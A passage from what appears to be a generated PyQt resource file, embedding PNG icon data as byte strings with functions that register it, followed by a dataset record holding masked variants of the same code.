\x19\x7e\x10\xb2\x77\xd0\xe6\xee\xc6\x43\x92\x28\x22\x0a\x03\xc4\
\x39\xc2\x30\xc0\xf7\x3d\x02\xdf\xc7\x29\x38\x6b\x20\x12\x54\x14\
\x18\x03\x14\x14\x05\x15\xc2\x41\x96\x21\xa2\xe3\xec\x05\x67\x1d\
\x8a\x47\x31\x1c\xb0\xf1\x70\x93\x61\x5e\x50\x99\x48\x99\x48\x12\
\x0e\x5a\x6d\xb2\x6c\x88\x29\x0a\xac\x29\x28\x86\x7d\xc0\xc3\x89\
\xa0\x87\xe5\x51\x41\x47\x16\x46\x80\x7e\x96\x11\x04\x11\xce\x5a\
\x54\x15\xe3\x04\xa2\x14\xc9\x07\x34\x36\xee\x12\x97\x26\x28\x8a\
\x82\x2c\x8e\x69\xec\xed\xd1\x6a\xb5\xc9\x86\x39\xed\xdd\x3a\xc3\
\x5e\x87\x64\x6a\x0e\x6b\x05\xe5\x10\x70\xd8\x87\xd1\x3e\xcc\xb2\
\x21\x49\x02\xce\x39\x54\x15\x67\x2d\x52\xaa\x12\xa5\x65\x1a\xb7\
\xae\x82\x1f\x32\xbb\x72\x82\x34\x49\x68\xec\xee\x8d\x66\x7d\x7b\
\x93\xbd\x7b\x37\x48\xfc\x90\x5c\x13\xac\x38\xfc\x51\xdd\xc7\xa5\
\xf9\x17\x40\x51\x18\x3c\x3f\xc0\x5a\x87\x8a\xe0\xac\xc5\x12\x12\
\x2e\x9c\x84\xee\x75\xee\xbf\xfd\x47\x76\xee\x2d\x92\x56\x67\x69\
\xee\x36\xe8\x36\x1b\xf4\x9b\x3b\x94\xf1\xf8\xcc\x62\x99\x5b\x7d\
\xc3\xbd\xb0\x4a\xd3\xf4\x1f\xcb\x5e\x55\xf1\x50\x42\x63\x0c\x41\
\x10\x8c\x32\x17\xc5\x5a\x87\x73\x0e\x1b\x4d\x52\x39\x75\x06\x7d\
\x78\x9b\xf6\xd6\x06\x3b\xff\xb8\x89\x35\x16\x51\x21\x2a\x4d\x50\
\x89\x27\xa8\x86\xc2\x7a\xf5\x34\x13\xfd\x9c\x1b\x31\x34\xb2\xce\
\xa3\xcc\x0f\xfb\x10\x5a\x6b\xb1\xc6\x62\x9d\x43\x9c\xe0\xdc\x08\
\x20\xce\x61\xfd\x94\xe0\xe8\x33\x1c\x99\x3d\x8e\x1b\xf6\x11\x51\
\x0e\x0e\x0e\xd8\xda\xd9\xe5\xc0\x78\x4c\xf5\x16\x58\x4d\x53\x3e\
\x32\x59\x46\xdb\x82\xc4\x8e\xc6\x70\x0c\x19\x0d\x2b\xa1\x73\x0e\
\xeb\x1c\xce\x5a\x9c\x93\xb1\x93\xf1\x34\xe9\xc8\x91\x25\x42\xa2\
\x2a\x22\xc2\xc0\xb5\x31\xd6\x81\x07\xef\x99\x26\xa1\xe7\xf3\x84\
\x5f\xe6\x58\x5c\x41\x73\x41\x4b\x4a\x23\x6b\x8f\x5d\x28\xa1\xb3\
\x0e\x17\xd8\x0f\xc6\xd4\x09\x22\x0e\xeb\xec\xbf\x39\x92\x31\xd8\
\xa2\x2a\x78\x78\xb4\xf3\x1e\xef\x8a\x83\x64\x91\xa3\x12\xb3\xa0\
\x09\x4a\x15\x2d\x09\x8d\xac\xed\x21\x82\x2f\xce\x79\x6e\x24\x8c\
\xb1\x38\x67\xc7\xcd\x1e\xbb\xb2\x6e\x24\x37\x5a\xc5\xb9\x0f\x5e\
\xac\x42\x3b\xef\xf3\xce\x70\x8b\xba\x5f\x20\x4e\x38\x52\xf8\xac\
\x6a\x95\xc9\x30\xd1\xcc\xe4\x9e\x6f\x8a\xc2\x16\x79\xd1\x36\x85\
\x79\xfc\x42\xeb\x46\x0d\xb7\xf6\xd1\xe5\xce\x8d\x5c\x1e\x3e\x2a\
\x55\xc1\xf3\xa0\x3d\xec\xf1\xce\x70\x8b\x9d\xd8\xe1\xfb\xb0\x5a\
\xda\xeb\x2d\x98\x9d\x57\x37\xb6\x5b\xb5\x70\x6f\xab\x76\x57\x94\
\x17\x81\x73\x61\x14\xaf\x07\x61\xb4\xe6\x07\xe1\x49\x55\xe6\x14\
\x12\x15\x79\x54\xba\xc3\xbd\xa2\x78\x80\xaa\xa0\x82\x35\x45\xde\
\xa8\x75\xda\x37\x8b\xb8\x7b\xed\x73\x4b\xcb\xd1\xf2\x74\xfd\xed\
\xa7\x1a\xf7\x2e\xbf\x76\xf1\xb9\x3c\x4c\xcb\xe5\x62\x7e\xf9\xd8\
\x9b\x5f\xfb\xfe\x4b\x6f\x9e\x9b\xf2\xc2\x99\xf9\xc5\xe9\x85\x95\
\xe3\x2b\xe5\xc9\xa9\xd5\xb8\x94\x9e\x89\xe2\xe4\x4c\x10\x44\x4f\
\xf9\x41\xb0\xec\xfb\x41\x55\x55\x02\x67\x6d\x6e\x4d\xb1\x93\xf5\
\xfb\xef\x0f\x07\xfd\x77\x07\xbd\xee\xd5\x22\xcf\x6f\xd5\x61\xf3\
\xea\xfb\x57\x9b\xaa\x97\xf3\x9b\xcf\x7d\x9d\x2f\xff\xec\x0d\xbc\
\xc7\xbe\x37\xcf\x63\x61\xe5\x38\xa7\xd7\xd6\xb9\x70\xf1\x1b\x5c\
\xba\x78\xc1\x07\x2a\x33\xf3\x4b\x0b\xd5\x23\xb3\xa7\xca\xd5\xa9\
\xb5\x3c\xeb\x2f\xed\xed\xd4\x6a\xfd\x76\xe7\xbe\x31\x45\x03\x68\
\x01\x9d\xb1\xb2\xf5\xa3\x73\xd2\xec\xb5\xd8\xec\x58\xfe\xa7\x08\
\xa3\x88\x27\x57\x3f\xc6\xab\xbf\xbf\x02\xe0\x03\xd1\x58\xf1\x58\
\xe1\xf8\xfc\xff\x34\xfe\x09\x50\xc9\xce\x14\x61\x6a\x10\x46\x00\
\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x63\x72\x65\x61\
\x74\x65\x00\x32\x30\x32\x30\x2d\x30\x37\x2d\x31\x39\x54\x30\x33\
\x3a\x33\x39\x3a\x31\x39\x2b\x30\x30\x3a\x30\x30\x9d\x70\x4c\x6c\
\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x6d\x6f\x64\
\x69\x66\x79\x00\x32\x30\x31\x39\x2d\x30\x31\x2d\x30\x38\x54\x31\
\x37\x3a\x35\x34\x3a\x30\x36\x2b\x30\x30\x3a\x30\x30\xfa\xae\x64\
\x88\x00\x00\x00\x20\x74\x45\x58\x74\x73\x6f\x66\x74\x77\x61\x72\
\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6d\x61\x67\x65\x6d\
\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\xbc\xcf\x1d\x9d\x00\x00\x00\
\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\
\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\
\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\
\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\x67\x68\x74\x00\x35\x31\
\x32\x8f\x8d\x53\x81\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\
\x00\x35\x31\x32\x1c\x7c\x03\xdc\x00\x00\x00\x19\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\
\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\
\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\
\x65\x00\x31\x35\x34\x36\x39\x37\x30\x30\x34\x36\xc4\x38\x95\x8f\
\x00\x00\x00\x13\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\
\x69\x7a\x65\x00\x31\x35\x32\x30\x39\x38\x42\xe5\x15\x0c\xcb\x00\
\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\
\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\
\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x30\x36\x2f\x31\x30\x36\x36\x32\x33\x38\x2e\x70\x6e\
\x67\x39\x3a\x2a\x0d\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x77\x47\
\x00\x70\
\x00\x6e\x00\x67\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x0b\
\x05\xff\xda\x07\
\x00\x31\
\x00\x31\x00\x33\x00\x37\x00\x32\x00\x36\x00\x34\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0e\
\x02\xd3\xb9\x87\
\x00\x64\
\x00\x65\x00\x61\x00\x6c\x00\x20\x00\x73\x00\x6d\x00\x61\x00\x6c\x00\x6c\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x07\
\x09\xc7\x57\xa7\
\x00\x73\
\x00\x65\x00\x74\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0b\
\x0f\x29\x4e\xc7\
\x00\x70\
\x00\x72\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x01\x74\x56\xe3\x3f\xc3\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x68\x2e\xd5\xff\x38\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x01\x74\xc4\x73\x3a\x8f\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
\x00\x00\x01\x74\xc4\x73\xad\x43\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
|
normal
|
{
"blob_id": "dbf831540d11a994d5483dc97c7eab474f91f0d3",
"index": 8118,
"step-1": "<mask token>\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\n<mask token>\n",
"step-2": "<mask token>\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\nqInitResources()\n",
"step-3": "<mask token>\nqt_resource_data = (\n b'\\x00\\x00\\x01\\xde\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00(\\x00\\x00\\x00(\\x08\\x06\\x00\\x00\\x00\\x8c\\xfe\\xb8m\\x00\\x00\\x01\\xa5IDATx\\x9c\\xed\\xd8?k\\x14A\\x1c\\x87\\xf1OB,\\x8dE\\x88X\\x0b\"$ \\xa4\\xb0I\\xa3(\\x8a\\x08\\xfei$M\\xf0\\xcc\\xebJaR\\xa8/\\xc1\\xca\" 6\\x82XYX\\x08*h\\xa2D\\xc54\\x81\\xa8\\x9bb8\\x18\\xe6vo/\\x97\\x9d5\\x1c\\xfb\\xc0\\xc0\\xdd\\xcc\\xee\\xcd\\xb3\\xbf\\xd9\\xfd\\xde\\xdc\\xd1\\xd1q2\\xb8\\x8f\\xef(\\x8e\\xd8\\xbe\\xe2V\\x1b\\x82\\xdb\\xb8<\\xc6y7\\xf0\\xbea\\x97R\\x8a1\\xcf;\\x83_M\\x8a\\xa4L\\xe7\\xfc\\xf0&\\x98x\\xc1}\\xfcs\\xf4\\x87+n\\xdfp\\xb7n\\xa2q\\xef\\xc1&X\\xc6\\xa7\\xba\\x83\\xfe\\xa7\\xe0\\xd0\\xf9\\'\\xfe\\x1e\\xcc\\xceD\\x08\\xae\\na|\\x9c\\'\\xb5\\xae\\x89^\\x1f`=\\x95\\xa8\\xbaIg\\xf1\\x03\\x0b#\\\\HS\\x9c\\xc3\\xef\\xfe\\x9b\\xba\\n\\xae\\xe0\\x05\\xde\\xe54J\\xb8\\x87\\xe7igU\\x05_\\xe2NV\\x9dA^\\xe1v\\xdaY&xA\\xd8N\\xcd\\xe46\\x8a\\xb8\\x88/\\xf1\\x9c\\xc3\\x96\\xf8!\\x9e\\xe2Of\\xa9\\x98\\x1e\\x9e\\x94\\xcd\\x99Vp\\x1a\\x1fq\\xa9\\x05\\xa9x\\xce\\xcfX,\\x1bL\\x05\\xaf\\xe1Mn\\xa3\\x84\\x9bx\\x9dvV-\\xf1\\x1a\\x1eg\\xd5\\x19\\xa4\\x87\\x8d\\xaa\\xc1\\xb8\\x82\\xa7\\x85\\xec\\x9b\\xcf,\\x143\\x8b\\x9f\\x98K\\x07\\xca*\\xf8\\x00[\\xc2\\x8f\\xa8\\xb6\\xe8\\xe7\\xedn\\xd5\\x01q\\x05\\xb7\\x84\\xb0l\\x93\\xda\\xbc\\xed\\x0b\\x9e\\xc7\\x0eN\\xe56\\x8a\\x18\\x9a\\xb7\\xe9\\x12\\xf7\\xf0L\\xf8\\xc2n\\x8b\\x91\\xf2\\xb6\\xc0\\x14>`\\xa9\\x05\\xa9>#\\xe7m\\x81\\xabx\\x9bY(\\xe5\\xba\\x9a\\xbc\\x8d\\x97\\xb8\\x87\\xcd\\xac:\\x83<2b\\xde\\x16B\\xf6\\x9d\\xcdi\\x131%\\xfc\\xa7\\xb3\\xa3$\\xfb\\xca\\xd8\\x93w\\xc7\\x9c\\xb6\\xbf\\xc2\\x1e\\xf3\\xca1/\\xb4\\xa3\\xa3\\xe3\\xc4s\\x08(\\x98\\x98$\\xc8\\xdd\\xa5@\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x03\\xab\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x03\\x00\\x00\\x00(-\\x0fS\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x84PLTE279\\x00\\x00\\x00279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279\\xff\\xff\\xff\\xeb}\\xd90\\x00\\x00\\x00*tRNS\\x00\\x00,\\xcf\\xb7\\x01\\x18 \\x1f\\x1c\\x15\\xbdx\\xc3\\xc1w\\'1\\x95\\xbe-\\xdfP\"\\x1e\\xca\\xdc$\\xc2(&2\\x1d\\x11\\xb9M\\xf4\\x12\\xdeO\\x88\\xe0\\xc4\\x83\\x03\\xa2\\x00\\x00\\x00\\x01bKGD+$\\xb9\\xe4\\x08\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x04\\x02\\x0c,^\\x9a\\xf1\\x93\\x00\\x00\\x00\\x89IDAT\\x18\\xd3U\\xcf\\xd9\\x12\\x820\\x10D\\xd1\\x8e\\x18\\x88\\xc8\\xb0\\xb8\\x05\\x01AAA\\xf3\\xff\\x1fh6\\x04\\xef[\\x9f\\xaa\\xa9J\\x80u\\x9b`\\x0b\\x1eF\\xc2\\x16\\xedx\\xbcW\\x01\\x12J]\\x94\\xe5\\xc5\\xe1x\\xc2\\xf9\"\\xa4\\xad,\\xe8Z\\xc4@%\\xfc}\\xdd(\\xbaq\\r\\x12\\x8c\\xe9\\xdd6\\xaa\\xe9\\xb2\\xbb\\x03\\xb7\\xa9.)\\x9a\\xc1\\xec\\x162\\x9d\\xe1\\xd1\\x9b\\xbd\\x82\\xe1\\xd9\\xeb\\xbd\\x82|x\\xe1\\x0fll\\x01\\x9f\\x07\\xb1\\xfcM\\x18\\x18\\'\\xfft)\\xc5D!\\xf0\\x1e\\xab_\\x9f\\x84\\xe3\\x0bP\\xe9\\x0c\\xb4\\xd8u\\xd4\\x0e\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:20+00:00\\x86g\\x0e\\\\\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T19:49:46+00:00\\xb0r2\\xb2\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x19tEXtThumb::Image::Height\\x001068\\x8a\\xfcQ\\x92\\x00\\x00\\x00\\x18tEXtThumb::Image::Width\\x001068\\x9f\\xb5\\x8d\\x8b\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546976986B7\\xbe\\xd0\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0018237B\\x1b]y\\xed\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/119/1190710.pngZ\\xd1vK\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\'\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x03\\x00\\x00\\x00\\xd7\\xa9\\xcd\\xca\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x02\\x01PLTE\\x00\\x00\\x00\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x88\\x84\\x8f\\x8d\\x8a\\x94\\x85\\x81\\x8c\\x85\\x82\\x8c\\x8a\\x87\\x91\\x8c\\x89\\x92\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8e\\x8b\\x95\\x8e\\x8b\\x94\\x90\\x8e\\x97\\x8b\\x87\\x92\\x9a\\x98\\xa1\\x98\\x96\\x9e\\x8e\\x8c\\x95\\x86\\x83\\x8e\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x97\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8d\\x8a\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x93\\x91\\x9a\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8f\\x8c\\x96\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8e\\x8c\\x95\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x8a\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8f\\x8c\\x95\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x89\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x90\\x8d\\x96\\x8b\\x88\\x92\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\xae\\xad\\xb3\\x00\\x00\\x00\\xb1\\xc2u\\x92\\x00\\x00\\x00\\xa6tRNS\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x13\\x15\\x15\\x14\\x06*\\xc2\\xcf\\xcf\\xceI\\x18\\x14E\\xfbo\\x07\\x14#\\xbc\\xb9+k\\xfe\\x91\\x02\\x12\\xbf*\\xbe\\xd5\\xa9\\xe8\\xee\\xa7\\xb8\\xc7\\x11\\xb8\\xc6\\x1e\\x08\\x94\\xc0\\x19\\xba\\xf4\\xf4\\xdb1\\xa1\\xdfy=<u\\xb5\\x03\\x05Ae\\x86\\xeb=6\\xd9\\xedqG+\\x04\\xcan\\xfb\\xc3\\x13\\xce\\xf44\\xf0\\xd0\\x15\\xcf;3\\xef\\xcf\\xc5\\xfdti\\xfe\\x040N\\xea\\xdb5/\\xd5\\xf2\\x96K\\xab\\xd9m33\\xb1\\x05%\\xf0\\xef\\xc1\\x17\\xb1\\x9a\\n\\x1a\\xc3\\xc8)\\xc6\\xc4\\xad\\xef\\xb7\\xd7\\xc1\\x9f\\x02\\x8a|\\x04,\\xba\\xcc\\x17\\x0bQ\\x16!\\xcc\\x15\\x04\\r\\xb7\\x9c\\xe1\\x00\\x00\\x00\\x01bKGD\\x00\\x88\\x05\\x1dH\\x00\\x00\\x00\\tpHYs\\x00\\x00\\x00d\\x00\\x00\\x00d\\x00\\x0f\\x96\\xc5\\xdd\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x080\\x1eJZ\\xd3x\\x00\\x00\\x01\\x8aIDAT(\\xcfc`\\x80\\x02F\\x11Q1q\\tI&\\x06$\\xc0\\x08\\x06R\\xd22\\xb2r\\xf2\\xccLLL,\\xacpq\\x05EFF%\\xe5e\\xcbW\\xa803\\xa9\\xaa1\\xb3\\xb1B\\xc5\\xd554\\xb5\\x18\\xb5u\\x80\\x12\\xbaz\\xfa\\xba\\x06\\x86\\xcc\\xec\\xac`\\tu\\xa3\\x95+\\x8dMLW\\x02%\\xcc\\xcc-V\\xac\\xb04d\\xe6\\x00IXY\\xaf\\x84\\x00\\xa0\\x04\\x04\\xd8\\xd8r\\x82$\\xec\\xec\\xd1%\\x1c\\x1c\\x99\\xc0F):A$\\x9c] \\xe2\\xaen\\xcc\\xcc\\x10\\xb7\\xba\\x83\\x84=<\\xbd\\xbc}\\\\A\\x12\\xbe~\\xcc\\x9cL\\x0c\\xfe\\x01\\x81A\\xc1 \\xf1\\x10F.n\\x8e\\xd00\\xa0DxDdT4\\x83h\\x0c\\xc4\\x1cO\\xa0NV\\x1e\\x8eX\\xb0aq\\xf1\\t\\x0c\\x8a\\x89`\\xf1\\xa4\\x10FF\\x06\\x06V\\xa6\\xe4\\x14\\xb0Lj\\x1a\\x83b:D\"\\x03$\\xc1\\xcb\\x94\\x99\\x05\\x96\\xc8Nc\\x10\\xcd\\xc9\\x05\\xcb\\xe4\\x01\\x8d\\xe2\\xe5c\\xce/\\x00K\\xc8I0\\x14\\x16\\x15\\xe7\\x95\\x00%J\\xcb\\x80\\x96\\xf3\\x97W\\x00E+\\xab\"\\xaa%\\xc1\\xce\\xad\\x01i\\xa9\\xad\\xabo\\xc8\\x07\\x89\\xafhlb\\x86x\\xa4\\x19b\\x8dNK+\\xc4\\x9c\\xb6v&\\xb0\\xcf\\xad:\\xd0\\x83\\xa4\\xb3\\x0b,\\xd1\\xdd\\x83.\\xd1\\x0b\\r\\xab\\xbe\\xfe\\x95+\\'L\\x9c\\x04\\x92\\xc8\\x9a<\\x05\\xe8$7f\\x01HDIM\\x9d\\xd6=}\\x06Hb\\xe6\\xac\\xd9s\\xe6\\xba1\\x0b\\nA\\xa3p\\xde|F\\xc6@\\xa0D\\xc1\\x02f\\xe6\\x85\\x8b\\x98\\x05y\\x90\\x13C\\xc0b\\x19Y\\xcbLf`j\\x10\\xe6AI*\\xfe\\x8abK\\x12\\x962\\xc3\\xf8\\x00/\\\\\\xba\\x88\\xe8\\x0b:,\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:18+00:00;\\x07G\\xd8\\x00\\x00\\x00%tEXtdate:modify\\x002020-05-02T01:28:55+00:00H\\x1ew\\xe4\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00ctEXtsvg:comment\\x00 Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) 